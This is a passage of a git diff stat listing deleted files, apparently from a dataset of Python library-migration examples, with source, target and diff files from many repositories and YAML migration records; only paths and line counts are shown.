...s$c7n_mailer$c7n_mailer$utils.py.source.py | 437 --- ...s$c7n_mailer$c7n_mailer$utils.py.target.py | 437 --- ...ools$c7n_mailer$c7n_mailer$address.py.diff | 90 - ...c7n_mailer$c7n_mailer$address.py.source.py | 88 - ...c7n_mailer$c7n_mailer$address.py.target.py | 89 - ...6__tools$c7n_mailer$c7n_mailer$cli.py.diff | 21 - ...ols$c7n_mailer$c7n_mailer$cli.py.source.py | 142 - ...ols$c7n_mailer$c7n_mailer$cli.py.target.py | 143 - ...tools$c7n_mailer$c7n_mailer$replay.py.diff | 13 - ...$c7n_mailer$c7n_mailer$replay.py.source.py | 125 - ...$c7n_mailer$c7n_mailer$replay.py.target.py | 125 - ..._tools$c7n_mailer$c7n_mailer$utils.py.diff | 46 - ...s$c7n_mailer$c7n_mailer$utils.py.source.py | 272 -- ...s$c7n_mailer$c7n_mailer$utils.py.target.py | 271 -- ...$salad$schema_salad$jsonld_context.py.diff | 180 - ...d$schema_salad$jsonld_context.py.source.py | 162 - ...d$schema_salad$jsonld_context.py.target.py | 177 - ...et__d707ff6__examples$run_eventlet.py.diff | 25 - ...707ff6__examples$run_eventlet.py.source.py | 15 - ...707ff6__examples$run_eventlet.py.target.py | 16 - 
..._002f5bd__Python Server$app$server.py.diff | 225 -- ...5bd__Python Server$app$server.py.source.py | 186 - ...5bd__Python Server$app$server.py.target.py | 153 - ...a-asyncio__cdaff15__opcua$uacrypto.py.diff | 161 - ...ncio__cdaff15__opcua$uacrypto.py.source.py | 113 - ...ncio__cdaff15__opcua$uacrypto.py.target.py | 63 - ...simo@myaas__0a65bcc__src$runserver.py.diff | 21 - ...myaas__0a65bcc__src$runserver.py.source.py | 11 - ...myaas__0a65bcc__src$runserver.py.target.py | 15 - ...__e192ca6__sql$utils$aes_decryptor.py.diff | 32 - ...2ca6__sql$utils$aes_decryptor.py.source.py | 44 - ...2ca6__sql$utils$aes_decryptor.py.target.py | 43 - .../holgern@beem__f5ba90e__beem$utils.py.diff | 26 - ...ern@beem__f5ba90e__beem$utils.py.source.py | 387 --- ...ern@beem__f5ba90e__beem$utils.py.target.py | 388 --- ..._components$server$src$routes$auth.py.diff | 95 - ...onents$server$src$routes$auth.py.source.py | 76 - ...onents$server$src$routes$auth.py.target.py | 95 - ...c$base_collectors$source_collector.py.diff | 281 -- ...e_collectors$source_collector.py.source.py | 231 -- ...e_collectors$source_collector.py.target.py | 205 -- ...$src$collector_utilities$functions.py.diff | 67 - ...collector_utilities$functions.py.source.py | 109 - ...collector_utilities$functions.py.target.py | 109 - ...ector$src$collector_utilities$type.py.diff | 23 - ...$src$collector_utilities$type.py.source.py | 18 - ...$src$collector_utilities$type.py.target.py | 19 - ...api_source_collectors$azure_devops.py.diff | 218 -- ...ource_collectors$azure_devops.py.source.py | 210 -- ...ource_collectors$azure_devops.py.target.py | 211 -- ...b-issue-classification$python$rest.py.diff | 72 - ...ue-classification$python$rest.py.source.py | 55 - ...ue-classification$python$rest.py.target.py | 62 - ...nagement_api$tenants$tenants_utils.py.diff | 32 - ...ent_api$tenants$tenants_utils.py.source.py | 256 -- ...ent_api$tenants$tenants_utils.py.target.py | 255 -- ...l-manager__71aff3a__tests$conftest.py.diff | 22 - ...ager__71aff3a__tests$conftest.py.source.py | 199 -- ...ager__71aff3a__tests$conftest.py.target.py | 199 -- ...tests$management_api_tests$context.py.diff | 37 - ...$management_api_tests$context.py.source.py | 120 - ...$management_api_tests$context.py.target.py | 120 - ...api_tests$endpoints$endpoint_utils.py.diff | 21 - ...ests$endpoints$endpoint_utils.py.source.py | 122 - ...ests$endpoints$endpoint_utils.py.target.py | 122 - ...__047263b__mycodo$mycodo_flask$api.py.diff | 60 - ...263b__mycodo$mycodo_flask$api.py.source.py | 39 - ...263b__mycodo$mycodo_flask$api.py.target.py | 46 - ...__mycodo$mycodo_flask$api$__init__.py.diff | 13 - ...odo$mycodo_flask$api$__init__.py.source.py | 71 - ...odo$mycodo_flask$api$__init__.py.target.py | 71 - ...3__mycodo$mycodo_flask$api$choices.py.diff | 17 - ...codo$mycodo_flask$api$choices.py.source.py | 228 -- ...codo$mycodo_flask$api$choices.py.target.py | 228 -- ...mycodo$mycodo_flask$api$controller.py.diff | 17 - ...o$mycodo_flask$api$controller.py.source.py | 80 - ...o$mycodo_flask$api$controller.py.target.py | 80 - ...73__mycodo$mycodo_flask$api$daemon.py.diff | 17 - ...ycodo$mycodo_flask$api$daemon.py.source.py | 84 - ...ycodo$mycodo_flask$api$daemon.py.target.py | 84 - ...173__mycodo$mycodo_flask$api$input.py.diff | 17 - ...mycodo$mycodo_flask$api$input.py.source.py | 120 - ...mycodo$mycodo_flask$api$input.py.target.py | 120 - ...9173__mycodo$mycodo_flask$api$math.py.diff | 17 - ..._mycodo$mycodo_flask$api$math.py.source.py | 90 - ..._mycodo$mycodo_flask$api$math.py.target.py | 90 - 
...ycodo$mycodo_flask$api$measurement.py.diff | 17 - ...$mycodo_flask$api$measurement.py.source.py | 313 -- ...$mycodo_flask$api$measurement.py.target.py | 313 -- ...73__mycodo$mycodo_flask$api$output.py.diff | 17 - ...ycodo$mycodo_flask$api$output.py.source.py | 194 -- ...ycodo$mycodo_flask$api$output.py.target.py | 194 -- ...69173__mycodo$mycodo_flask$api$pid.py.diff | 17 - ...__mycodo$mycodo_flask$api$pid.py.source.py | 90 - ...__mycodo$mycodo_flask$api$pid.py.target.py | 90 - ...__mycodo$mycodo_flask$api$settings.py.diff | 17 - ...odo$mycodo_flask$api$settings.py.source.py | 557 --- ...odo$mycodo_flask$api$settings.py.target.py | 557 --- ...mycodo_flask$api$sql_schema_fields.py.diff | 11 - ...o_flask$api$sql_schema_fields.py.source.py | 243 -- ...o_flask$api$sql_schema_fields.py.target.py | 243 -- ..._547f6d9__mycodo$controller_sensor.py.diff | 306 -- ...6d9__mycodo$controller_sensor.py.source.py | 974 ------ ...6d9__mycodo$controller_sensor.py.target.py | 945 ----- ...ycodo$devices$atlas_scientific_i2c.py.diff | 95 - ...$devices$atlas_scientific_i2c.py.source.py | 192 - ...$devices$atlas_scientific_i2c.py.target.py | 194 -- ...codo$devices$atlas_scientific_uart.py.diff | 126 - ...devices$atlas_scientific_uart.py.source.py | 138 - ...devices$atlas_scientific_uart.py.target.py | 142 - ...ycodo__547f6d9__mycodo$sensors$k30.py.diff | 60 - ...__547f6d9__mycodo$sensors$k30.py.source.py | 121 - ...__547f6d9__mycodo$sensors$k30.py.target.py | 120 - ...do__547f6d9__mycodo$sensors$mh_z16.py.diff | 77 - ...47f6d9__mycodo$sensors$mh_z16.py.source.py | 240 -- ...47f6d9__mycodo$sensors$mh_z16.py.target.py | 238 -- ...do__547f6d9__mycodo$sensors$mh_z19.py.diff | 75 - ...47f6d9__mycodo$sensors$mh_z19.py.source.py | 121 - ...47f6d9__mycodo$sensors$mh_z19.py.target.py | 123 - ...roservices$projection_image$server.py.diff | 37 - ...vices$projection_image$server.py.source.py | 127 - ...vices$projection_image$server.py.target.py | 127 - ...udgeshu__b687d20__submission$tasks.py.diff | 21 - ...hu__b687d20__submission$tasks.py.source.py | 9 - ...hu__b687d20__submission$tasks.py.target.py | 9 - ...@byob__9291b54__byob$core$security.py.diff | 56 - ...__9291b54__byob$core$security.py.source.py | 157 - ...__9291b54__byob$core$security.py.target.py | 157 - ...byob__9291b54__byob$modules$ransom.py.diff | 65 - ..._9291b54__byob$modules$ransom.py.source.py | 239 -- ..._9291b54__byob$modules$ransom.py.target.py | 239 -- ...955ac9__nni$experiment$config$base.py.diff | 22 - ...9__nni$experiment$config$base.py.source.py | 153 - ...9__nni$experiment$config$base.py.target.py | 153 - ...5ac9__nni$experiment$config$common.py.diff | 22 - ..._nni$experiment$config$common.py.source.py | 189 - ..._nni$experiment$config$common.py.target.py | 189 - ...ac9__nni$tools$nnictl$common_utils.py.diff | 22 - ...nni$tools$nnictl$common_utils.py.source.py | 125 - ...nni$tools$nnictl$common_utils.py.target.py | 125 - ...__nni$tools$package_utils$__init__.py.diff | 28 - ...$tools$package_utils$__init__.py.source.py | 229 -- ...$tools$package_utils$__init__.py.target.py | 229 -- ...9__test$nni_test$nnitest$run_tests.py.diff | 22 - ...st$nni_test$nnitest$run_tests.py.source.py | 293 -- ...st$nni_test$nnitest$run_tests.py.target.py | 293 -- ...55ac9__test$nni_test$nnitest$utils.py.diff | 28 - ...__test$nni_test$nnitest$utils.py.source.py | 181 - ...__test$nni_test$nnitest$utils.py.target.py | 181 - ...chmark_test$scripts$milvus_helpers.py.diff | 87 - ...k_test$scripts$milvus_helpers.py.source.py | 156 - 
...k_test$scripts$milvus_helpers.py.target.py | 165 - ...k_deploy$server$src$milvus_helpers.py.diff | 57 - ...loy$server$src$milvus_helpers.py.source.py | 119 - ...loy$server$src$milvus_helpers.py.target.py | 119 - ...etection$server$src$milvus_helpers.py.diff | 16 - ...ion$server$src$milvus_helpers.py.source.py | 119 - ...ion$server$src$milvus_helpers.py.target.py | 115 - ...k_deploy$server$src$milvus_helpers.py.diff | 16 - ...loy$server$src$milvus_helpers.py.source.py | 121 - ...loy$server$src$milvus_helpers.py.target.py | 117 - ...5d2__qary$skills$search_fuzzy_bots.py.diff | 22 - ...qary$skills$search_fuzzy_bots.py.source.py | 117 - ...qary$skills$search_fuzzy_bots.py.target.py | 117 - ...plugins__2c40713__WorldTime$plugin.py.diff | 46 - ...ns__2c40713__WorldTime$plugin.py.source.py | 217 -- ...ns__2c40713__WorldTime$plugin.py.target.py | 212 -- ...noria-plugins__33c7a3f__NBA$plugin.py.diff | 116 - ...-plugins__33c7a3f__NBA$plugin.py.source.py | 829 ----- ...-plugins__33c7a3f__NBA$plugin.py.target.py | 831 ----- ...noria-plugins__33c7a3f__NHL$plugin.py.diff | 161 - ...-plugins__33c7a3f__NHL$plugin.py.source.py | 760 ---- ...-plugins__33c7a3f__NHL$plugin.py.target.py | 746 ---- ..._4377d67__web-app$qfieldcloud$urls.py.diff | 49 - ...d67__web-app$qfieldcloud$urls.py.source.py | 27 - ...d67__web-app$qfieldcloud$urls.py.target.py | 54 - ...oslo_messaging$_drivers$impl_kafka.py.diff | 400 --- ...messaging$_drivers$impl_kafka.py.source.py | 425 --- ...messaging$_drivers$impl_kafka.py.target.py | 456 --- ...$orchest-api$app$app$apis$__init__.py.diff | 11 - ...est-api$app$app$apis$__init__.py.source.py | 29 - ...est-api$app$app$apis$__init__.py.target.py | 29 - ...$apis$namespace_environment_builds.py.diff | 13 - ...$namespace_environment_builds.py.source.py | 342 -- ...$namespace_environment_builds.py.target.py | 342 -- ...$apis$namespace_environment_images.py.diff | 13 - ...$namespace_environment_images.py.source.py | 177 - ...$namespace_environment_images.py.target.py | 177 - ...app$app$apis$namespace_experiments.py.diff | 33 - ...pp$apis$namespace_experiments.py.source.py | 438 --- ...pp$apis$namespace_experiments.py.target.py | 440 --- ...i$app$app$apis$namespace_pipelines.py.diff | 16 - ...$app$apis$namespace_pipelines.py.source.py | 62 - ...$app$apis$namespace_pipelines.py.target.py | 62 - ...pi$app$app$apis$namespace_projects.py.diff | 16 - ...p$app$apis$namespace_projects.py.source.py | 89 - ...p$app$apis$namespace_projects.py.target.py | 89 - ...st-api$app$app$apis$namespace_runs.py.diff | 13 - ...i$app$app$apis$namespace_runs.py.source.py | 259 -- ...i$app$app$apis$namespace_runs.py.target.py | 259 -- ...pi$app$app$apis$namespace_sessions.py.diff | 13 - ...p$app$apis$namespace_sessions.py.source.py | 179 - ...p$app$apis$namespace_sessions.py.target.py | 179 - ...app$app$apis$namespace_validations.py.diff | 13 - ...pp$apis$namespace_validations.py.source.py | 103 - ...pp$apis$namespace_validations.py.target.py | 103 - ...ervices$orchest-api$app$app$schema.py.diff | 13 - ...es$orchest-api$app$app$schema.py.source.py | 383 -- ...es$orchest-api$app$app$schema.py.target.py | 383 -- ...services$orchest-api$app$app$utils.py.diff | 13 - ...ces$orchest-api$app$app$utils.py.source.py | 394 --- ...ces$orchest-api$app$app$utils.py.target.py | 394 --- ..._flask_article__0a70f2b__app$films.py.diff | 57 - ...k_article__0a70f2b__app$films.py.source.py | 44 - ...k_article__0a70f2b__app$films.py.target.py | 42 - ...lask_article__0a70f2b__app$reviews.py.diff | 34 - 
...article__0a70f2b__app$reviews.py.source.py | 21 - ...article__0a70f2b__app$reviews.py.target.py | 20 - ...an_flask_article__0a70f2b__app$run.py.diff | 55 - ...ask_article__0a70f2b__app$run.py.source.py | 50 - ...ask_article__0a70f2b__app$run.py.target.py | 27 - ...orter$lambda$cross_region_importer.py.diff | 60 - ...$lambda$cross_region_importer.py.source.py | 221 -- ...$lambda$cross_region_importer.py.target.py | 209 -- ...da$cross_region_import_replication.py.diff | 210 -- ...oss_region_import_replication.py.source.py | 162 - ...oss_region_import_replication.py.target.py | 126 - ...rator__598f275__src$api$IocManager.py.diff | 13 - ...__598f275__src$api$IocManager.py.source.py | 143 - ...__598f275__src$api$IocManager.py.target.py | 143 - ...rollers$common$models$CommonModels.py.diff | 55 - ...rs$common$models$CommonModels.py.source.py | 40 - ...rs$common$models$CommonModels.py.target.py | 66 - ...connection$models$ConnectionModels.py.diff | 13 - ...ction$models$ConnectionModels.py.source.py | 357 -- ...ction$models$ConnectionModels.py.target.py | 357 -- ...ation$models$DataIntegrationModels.py.diff | 13 - ...$models$DataIntegrationModels.py.source.py | 289 -- ...$models$DataIntegrationModels.py.target.py | 289 -- ...i$controllers$job$models$JobModels.py.diff | 13 - ...trollers$job$models$JobModels.py.source.py | 79 - ...trollers$job$models$JobModels.py.target.py | 79 - ...eration$models$DataOperationModels.py.diff | 13 - ...on$models$DataOperationModels.py.source.py | 165 - ...on$models$DataOperationModels.py.target.py | 165 - ...peration$models$JobSchedulerModels.py.diff | 13 - ...ion$models$JobSchedulerModels.py.source.py | 91 - ...ion$models$JobSchedulerModels.py.target.py | 91 - ...api$infrastructor$api$ResourceBase.py.diff | 10 - ...nfrastructor$api$ResourceBase.py.source.py | 5 - ...nfrastructor$api$ResourceBase.py.target.py | 5 - ...lingo__1d8923a__musicbot$linkutils.py.diff | 89 - ...__1d8923a__musicbot$linkutils.py.source.py | 192 - ...__1d8923a__musicbot$linkutils.py.target.py | 197 -- ...vatory$dashboard$models$Screenshot.py.diff | 13 - ...y$dashboard$models$Screenshot.py.source.py | 118 - ...y$dashboard$models$Screenshot.py.target.py | 118 - ...ap@rocketmap__2960ec6__pogom$utils.py.diff | 170 - ...cketmap__2960ec6__pogom$utils.py.source.py | 194 -- ...cketmap__2960ec6__pogom$utils.py.target.py | 141 - ...eye__a7375cc__pyfront$app$__init__.py.diff | 38 - ...a7375cc__pyfront$app$__init__.py.source.py | 17 - ...a7375cc__pyfront$app$__init__.py.target.py | 23 - ...shoebot__0171fb9__shoebot$data$img.py.diff | 13 - ...ot__0171fb9__shoebot$data$img.py.source.py | 138 - ...ot__0171fb9__shoebot$data$img.py.target.py | 138 - ...813214e__example$blueprint$example.py.diff | 38 - ...4e__example$blueprint$example.py.source.py | 55 - ...4e__example$blueprint$example.py.target.py | 55 - ..._813214e__example$current_app$main.py.diff | 18 - ...14e__example$current_app$main.py.source.py | 49 - ...14e__example$current_app$main.py.target.py | 42 - ...ents-api__813214e__example$example.py.diff | 28 - ...api__813214e__example$example.py.source.py | 40 - ...api__813214e__example$example.py.target.py | 50 - ...example$working_with_proxy$example.py.diff | 39 - ...le$working_with_proxy$example.py.source.py | 65 - ...le$working_with_proxy$example.py.target.py | 66 - ...2a__tutorial$PythOnBoardingBot$app.py.diff | 13 - ...utorial$PythOnBoardingBot$app.py.source.py | 147 - ...utorial$PythOnBoardingBot$app.py.target.py | 147 - ...torial$PythOnBoardingBot$async_app.py.diff | 68 - 
...l$PythOnBoardingBot$async_app.py.source.py | 149 - ...l$PythOnBoardingBot$async_app.py.target.py | 150 - ...ickbot$trickbot_artifact_decrypter.py.diff | 43 - ...t$trickbot_artifact_decrypter.py.source.py | 286 -- ...t$trickbot_artifact_decrypter.py.target.py | 289 -- ...l@rtkbase__a4c347a__web_app$server.py.diff | 19 - ...base__a4c347a__web_app$server.py.source.py | 463 --- ...base__a4c347a__web_app$server.py.target.py | 463 --- ...l@rtkbase__cf856c0__web_app$server.py.diff | 55 - ...base__cf856c0__web_app$server.py.source.py | 471 --- ...base__cf856c0__web_app$server.py.target.py | 473 --- ...esiam@voice2json__7ea7ddb__web$app.py.diff | 225 -- ...@voice2json__7ea7ddb__web$app.py.source.py | 480 --- ...@voice2json__7ea7ddb__web$app.py.target.py | 489 --- ...query$gcloud$aio$bigquery$bigquery.py.diff | 83 - ...$gcloud$aio$bigquery$bigquery.py.source.py | 135 - ...$gcloud$aio$bigquery$bigquery.py.target.py | 126 - ...ore$gcloud$aio$datastore$datastore.py.diff | 83 - ...cloud$aio$datastore$datastore.py.source.py | 176 - ...cloud$aio$datastore$datastore.py.target.py | 189 - ...eue$gcloud$aio$taskqueue$taskqueue.py.diff | 502 --- ...cloud$aio$taskqueue$taskqueue.py.source.py | 376 -- ...cloud$aio$taskqueue$taskqueue.py.target.py | 149 - ...cape_api$services$location_service.py.diff | 38 - ...api$services$location_service.py.source.py | 27 - ...api$services$location_service.py.target.py | 29 - ...cityscape_api$services$sun_service.py.diff | 36 - ...cape_api$services$sun_service.py.source.py | 39 - ...cape_api$services$sun_service.py.target.py | 41 - ...scape_api$services$weather_service.py.diff | 25 - ..._api$services$weather_service.py.source.py | 16 - ..._api$services$weather_service.py.target.py | 17 - ...rc$10-async-web$acityscape_api$app.py.diff | 19 - ...-async-web$acityscape_api$app.py.source.py | 34 - ...-async-web$acityscape_api$app.py.target.py | 34 - ...-web$acityscape_api$views$city_api.py.diff | 32 - ...acityscape_api$views$city_api.py.source.py | 21 - ...acityscape_api$views$city_api.py.target.py | 21 - ...sync-web$acityscape_api$views$home.py.diff | 19 - ...web$acityscape_api$views$home.py.source.py | 15 - ...web$acityscape_api$views$home.py.target.py | 15 - ...$web_scraping$async_scrape$program.py.diff | 63 - ...scraping$async_scrape$program.py.source.py | 40 - ...scraping$async_scrape$program.py.target.py | 58 - ...0__services$users$project$api$ping.py.diff | 25 - ...rvices$users$project$api$ping.py.source.py | 16 - ...rvices$users$project$api$ping.py.target.py | 14 - ...ices$users$project$api$users$views.py.diff | 190 - ...users$project$api$users$views.py.source.py | 113 - ...users$project$api$users$views.py.target.py | 97 - ...ve__b86b375__web$app$notifications.py.diff | 78 - ...86b375__web$app$notifications.py.source.py | 427 --- ...86b375__web$app$notifications.py.target.py | 427 --- ...e__936761f__datetimerange$__init__.py.diff | 73 - ...6761f__datetimerange$__init__.py.source.py | 737 ---- ...6761f__datetimerange$__init__.py.target.py | 751 ---- ..._45fac3c__pingparsing$_pingparsing.py.diff | 57 - ...c3c__pingparsing$_pingparsing.py.source.py | 261 -- ...c3c__pingparsing$_pingparsing.py.target.py | 262 -- ...ac3c__pingparsing$_pingtransmitter.py.diff | 80 - ..._pingparsing$_pingtransmitter.py.source.py | 161 - ..._pingparsing$_pingtransmitter.py.target.py | 166 - ...__26c8e74__sqlitebiter$sqlitebiter.py.diff | 53 - ...8e74__sqlitebiter$sqlitebiter.py.source.py | 341 -- ...8e74__sqlitebiter$sqlitebiter.py.target.py | 341 -- ...__311c7ce__sqlitebiter$sqlitebiter.py.diff | 
142 - ...c7ce__sqlitebiter$sqlitebiter.py.source.py | 500 --- ...c7ce__sqlitebiter$sqlitebiter.py.target.py | 485 --- ...cconfig__7ba8676__tcconfig$_logger.py.diff | 88 - ...ig__7ba8676__tcconfig$_logger.py.source.py | 64 - ...ig__7ba8676__tcconfig$_logger.py.target.py | 46 - ...auto-split__86244b6__src$AutoSplit.py.diff | 149 - ...split__86244b6__src$AutoSplit.py.source.py | 972 ------ ...split__86244b6__src$AutoSplit.py.target.py | 965 ----- ...ool@auto-split__86244b6__src$about.py.diff | 58 - ...uto-split__86244b6__src$about.py.source.py | 78 - ...uto-split__86244b6__src$about.py.target.py | 79 - ...ol@auto-split__86244b6__src$design.py.diff | 306 -- ...to-split__86244b6__src$design.py.source.py | 561 --- ...to-split__86244b6__src$design.py.target.py | 563 --- ...split__86244b6__src$error_messages.py.diff | 184 - ...__86244b6__src$error_messages.py.source.py | 142 - ...__86244b6__src$error_messages.py.target.py | 93 - ...@auto-split__86244b6__src$menu_bar.py.diff | 11 - ...-split__86244b6__src$menu_bar.py.source.py | 20 - ...-split__86244b6__src$menu_bar.py.target.py | 20 - ...o-split__86244b6__src$resources_rc.py.diff | 21 - ...it__86244b6__src$resources_rc.py.source.py | 3092 ----------------- ...it__86244b6__src$resources_rc.py.target.py | 3089 ---------------- ...-split__86244b6__src$screen_region.py.diff | 130 - ...t__86244b6__src$screen_region.py.source.py | 289 -- ...t__86244b6__src$screen_region.py.target.py | 292 -- ...-split__86244b6__src$settings_file.py.diff | 11 - ...t__86244b6__src$settings_file.py.source.py | 267 -- ...t__86244b6__src$settings_file.py.target.py | 267 -- ...uber-server$src$openvtuber$web$web.py.diff | 30 - ...server$src$openvtuber$web$web.py.source.py | 17 - ...server$src$openvtuber$web$web.py.target.py | 16 - ...syl@weasyl__d10cb16__weasyl$define.py.diff | 52 - ...easyl__d10cb16__weasyl$define.py.source.py | 1087 ------ ...easyl__d10cb16__weasyl$define.py.target.py | 1078 ------ ...weasyl__d10cb16__weasyl$middleware.py.diff | 203 -- ...l__d10cb16__weasyl$middleware.py.source.py | 505 --- ...l__d10cb16__weasyl$middleware.py.target.py | 415 --- ...asyl@weasyl__f6230c7__weasyl$login.py.diff | 33 - ...weasyl__f6230c7__weasyl$login.py.source.py | 304 -- ...weasyl__f6230c7__weasyl$login.py.target.py | 305 -- ...p-ui__8ef3b62__burpui$api$__init__.py.diff | 13 - ..._8ef3b62__burpui$api$__init__.py.source.py | 43 - ..._8ef3b62__burpui$api$__init__.py.target.py | 43 - ...urp-ui__8ef3b62__burpui$api$client.py.diff | 13 - ...i__8ef3b62__burpui$api$client.py.source.py | 358 -- ...i__8ef3b62__burpui$api$client.py.target.py | 358 -- ...rp-ui__8ef3b62__burpui$api$clients.py.diff | 13 - ...__8ef3b62__burpui$api$clients.py.source.py | 314 -- ...__8ef3b62__burpui$api$clients.py.target.py | 314 -- ...@burp-ui__8ef3b62__burpui$api$misc.py.diff | 13 - ...-ui__8ef3b62__burpui$api$misc.py.source.py | 84 - ...-ui__8ef3b62__burpui$api$misc.py.target.py | 84 - ...rp-ui__8ef3b62__burpui$api$restore.py.diff | 13 - ...__8ef3b62__burpui$api$restore.py.source.py | 255 -- ...__8ef3b62__burpui$api$restore.py.target.py | 255 -- ...rp-ui__8ef3b62__burpui$api$servers.py.diff | 13 - ...__8ef3b62__burpui$api$servers.py.source.py | 97 - ...__8ef3b62__burpui$api$servers.py.target.py | 97 - ...p-ui__8ef3b62__burpui$api$settings.py.diff | 13 - ..._8ef3b62__burpui$api$settings.py.source.py | 311 -- ..._8ef3b62__burpui$api$settings.py.target.py | 311 -- ...ns$bridge_with_slack$run-slack-bridge.diff | 36 - ...idge_with_slack$run-slack-bridge.source.py | 136 - 
...idge_with_slack$run-slack-bridge.target.py | 137 - v1/data/libpair/appdirs,platformdirs.yaml | 4 - v1/data/libpair/argparse,configargparse.yaml | 4 - v1/data/libpair/attr,attrs.yaml | 4 - v1/data/libpair/celery,rq.yaml | 4 - v1/data/libpair/cheetah,cheetah3.yaml | 4 - v1/data/libpair/dataproperty,typepy.yaml | 4 - ...egistration,django-registration-redux.yaml | 4 - .../libpair/django-rest-swagger,drf-yasg.yaml | 4 - v1/data/libpair/dotenv,python-dotenv.yaml | 4 - v1/data/libpair/eventlet,gevent.yaml | 4 - v1/data/libpair/flask,fastapi.yaml | 4 - v1/data/libpair/flask,quart.yaml | 4 - v1/data/libpair/flask,uvicorn.yaml | 4 - .../libpair/flask-restful,flask-restplus.yaml | 4 - .../libpair/flask-restplus,flask-restx.yaml | 4 - .../flask-security,flask-security-too.yaml | 4 - v1/data/libpair/fuzzywuzzy,rapidfuzz.yaml | 4 - v1/data/libpair/gcloud-aio-core,aiohttp.yaml | 4 - v1/data/libpair/gevent,eventlet.yaml | 4 - v1/data/libpair/gunicorn,waitress.yaml | 4 - v1/data/libpair/huey,celery.yaml | 4 - v1/data/libpair/jwt,pyjwt.yaml | 4 - .../libpair/kafka-python,confluent-kafka.yaml | 4 - v1/data/libpair/keras,torch.yaml | 4 - v1/data/libpair/lockfile,fasteners.yaml | 4 - v1/data/libpair/logbook,loguru.yaml | 4 - v1/data/libpair/magic,python-magic.yaml | 4 - v1/data/libpair/mysql-python,mysqlclient.yaml | 4 - v1/data/libpair/mysql-python,pymysql.yaml | 4 - v1/data/libpair/mysqlclient,psycopg2.yaml | 4 - v1/data/libpair/openpyxl,xlsxwriter.yaml | 4 - v1/data/libpair/pandas,numpy.yaml | 4 - v1/data/libpair/pil,pillow.yaml | 4 - v1/data/libpair/pillow,torchvision.yaml | 4 - v1/data/libpair/py-bcrypt,bcrypt.yaml | 4 - v1/data/libpair/pycrypto,cryptography.yaml | 4 - v1/data/libpair/pycrypto,pycryptodome.yaml | 4 - .../libpair/pycryptodome,pycryptodomex.yaml | 4 - v1/data/libpair/pymilvus-orm,pymilvus.yaml | 4 - v1/data/libpair/pyqt5,pyside6.yaml | 4 - v1/data/libpair/python-ldap,ldap3.yaml | 4 - ...on-social-auth,social-auth-app-django.yaml | 4 - v1/data/libpair/pytz,pendulum.yaml | 4 - v1/data/libpair/pyyaml,ruamel.yaml.yaml | 4 - v1/data/libpair/raven,sentry-sdk.yaml | 4 - v1/data/libpair/requests,aiohttp.yaml | 4 - v1/data/libpair/retrying,tenacity.yaml | 4 - v1/data/libpair/ruamel.yaml,pyyaml.yaml | 4 - v1/data/libpair/s3cmd,awscli.yaml | 4 - v1/data/libpair/scapy-python3,scapy.yaml | 4 - v1/data/libpair/sklearn,torch.yaml | 4 - v1/data/libpair/slackclient,slack-sdk.yaml | 4 - v1/data/libpair/slugify,python-slugify.yaml | 4 - v1/data/libpair/tensorboard,tensorboardx.yaml | 4 - v1/data/libpair/urllib,urllib3.yaml | 4 - v1/data/libpair/uwsgi,gunicorn.yaml | 4 - v1/data/libpair/websocket-client,tornado.yaml | 4 - v1/data/libpair/xlrd,openpyxl.yaml | 4 - v1/data/libpair/xlsxwriter,openpyxl.yaml | 4 - v1/data/migration/002f5bd_flask,quart.yaml | 17 - v1/data/migration/0171fb9_pil,pillow.yaml | 16 - .../02b064b_pycryptodome,pycryptodomex.yaml | 13 - v1/data/migration/03a9621_s3cmd,awscli.yaml | 12 - .../migration/0411d6a_raven,sentry-sdk.yaml | 20 - .../047263b_flask-restful,flask-restplus.yaml | 12 - v1/data/migration/04a5913_pil,pillow.yaml | 14 - .../054d5d2_fuzzywuzzy,rapidfuzz.yaml | 18 - .../migration/08e7ffa_gunicorn,waitress.yaml | 9 - .../0911992_pycrypto,pycryptodome.yaml | 10 - .../migration/0a65bcc_raven,sentry-sdk.yaml | 12 - v1/data/migration/0a70f2b_flask,quart.yaml | 20 - .../migration/0d78d19_lockfile,fasteners.yaml | 27 - v1/data/migration/0df86b5_logbook,loguru.yaml | 9 - .../migration/12e3e80_ruamel.yaml,pyyaml.yaml | 18 - .../14388c3_pycrypto,pycryptodome.yaml | 16 - 
...on-social-auth,social-auth-app-django.yaml | 12 - .../19dde42_pycryptodome,pycryptodomex.yaml | 24 - .../migration/1c574c1_requests,aiohttp.yaml | 9 - .../migration/1d8923a_requests,aiohttp.yaml | 14 - v1/data/migration/22cc3f0_flask,quart.yaml | 16 - v1/data/migration/24a848d_flask,fastapi.yaml | 12 - v1/data/migration/24a848d_flask,uvicorn.yaml | 9 - .../26c8e74_dataproperty,typepy.yaml | 16 - .../migration/27e2a46_pillow,torchvision.yaml | 9 - .../2960ec6_argparse,configargparse.yaml | 24 - v1/data/migration/2adc6a9_xlrd,openpyxl.yaml | 9 - v1/data/migration/2c40713_pytz,pendulum.yaml | 12 - .../2d9cf64_slackclient,slack-sdk.yaml | 15 - v1/data/migration/2fc0f26_pil,pillow.yaml | 9 - v1/data/migration/311c7ce_logbook,loguru.yaml | 13 - v1/data/migration/31212eb_pil,pillow.yaml | 9 - v1/data/migration/33c7a3f_pytz,pendulum.yaml | 15 - .../migration/356ce56_raven,sentry-sdk.yaml | 9 - .../35ae8f3_mysql-python,mysqlclient.yaml | 10 - v1/data/migration/35d8144_urllib,urllib3.yaml | 9 - v1/data/migration/3abbc43_flask,fastapi.yaml | 13 - v1/data/migration/3abbc43_flask,uvicorn.yaml | 13 - v1/data/migration/3f786f4_uwsgi,gunicorn.yaml | 9 - v1/data/migration/432afa4_jwt,pyjwt.yaml | 9 - .../4377d67_django-rest-swagger,drf-yasg.yaml | 15 - v1/data/migration/43e8ec2_celery,rq.yaml | 9 - .../45d94dd_gcloud-aio-core,aiohttp.yaml | 13 - .../45fac3c_dataproperty,typepy.yaml | 26 - .../472f336_xlsxwriter,openpyxl.yaml | 13 - .../49cf693_pycrypto,pycryptodome.yaml | 11 - .../migration/4ad53b5_py-bcrypt,bcrypt.yaml | 41 - v1/data/migration/4c3400a_pil,pillow.yaml | 11 - v1/data/migration/4fc081b_keras,torch.yaml | 10 - .../50b7bae_mysqlclient,psycopg2.yaml | 14 - .../5169173_flask-restplus,flask-restx.yaml | 42 - .../migration/51f2688_gevent,eventlet.yaml | 15 - v1/data/migration/528b986_jwt,pyjwt.yaml | 9 - v1/data/migration/5393290_pil,pillow.yaml | 10 - .../migration/53f2073_requests,aiohttp.yaml | 9 - .../migration/547f6d9_lockfile,fasteners.yaml | 37 - .../migration/56e3253_python-ldap,ldap3.yaml | 9 - .../57d12c4_openpyxl,xlsxwriter.yaml | 12 - .../58237dc_mysql-python,pymysql.yaml | 